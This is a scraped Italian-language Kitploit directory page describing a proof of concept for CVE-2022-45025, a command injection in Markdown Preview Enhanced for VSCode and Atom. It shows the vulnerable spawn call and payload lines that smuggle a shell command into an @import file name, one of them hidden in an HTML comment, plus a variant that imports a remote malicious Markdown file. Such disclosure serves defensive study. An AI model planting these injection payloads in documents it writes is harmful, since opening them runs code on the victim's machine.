Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-45025 — [PoC] Iniezione di comandi tramite importazione PDF in Markdown Preview Enhanced (VSCode, Atom) | Kitploit
Strumenti/GitHubGitHub/yuriisanin/cve-2022-45025
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubyuriisanin/cve-2022-45025

CVE-2022-45025

[PoC] Iniezione di comandi tramite importazione PDF in Markdown Preview Enhanced (VSCode, Atom)

Vedi Repository
88173 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-45025

Iniezione di comandi tramite importazione PDF in Markdown Preview Enhanced (VSCode, Atom)

Descrizione

La Mume libreria di strumenti Markdown era vulnerabile all'iniezione di comandi a causa dell'uso del comando spawn con l'opzione {shell: true}. Ciò potrebbe consentire a un attaccante di eseguire codice arbitrario ingannando la vittima facendole aprire un file Markdown appositamente creato utilizzando VSCode o Atom. La libreria alimenta il plugin Markdown Preview Enhanced sia per VSCode che per Atom.

Vulnerabile frammento di codice:

root@kitploit:~
const task = spawn(
      "pdf2svg",
      [
        `"${pdfFilePath}"`,
        `"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
        "all",
      ],
      { shell: true },
    )

Prova di concetto

Il seguente documento Markdown consente a un attaccante di eseguire un comando arbitrario:

root@kitploit:~
@import "$(open -a Calculator > /dev/null | exit 0)hello.pdf"

The following comment will be recognised by MPE as valid "@import" command:

<!-- @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf" -->

In alternativa, il payload potrebbe essere eseguito da una fonte esterna:

root@kitploit:~
<!-- @import "https://raw.githubusercontent.com/yuriisanin/CVE-2022-45025/main/examples/malicious.md" -->

DEMO sia per VSCode che per Atom su YouTube.

vscode-rce-poc-gif

Supporto

Puoi seguirmi su Twitter, GitHub o YouTube.

Scarica lo strumento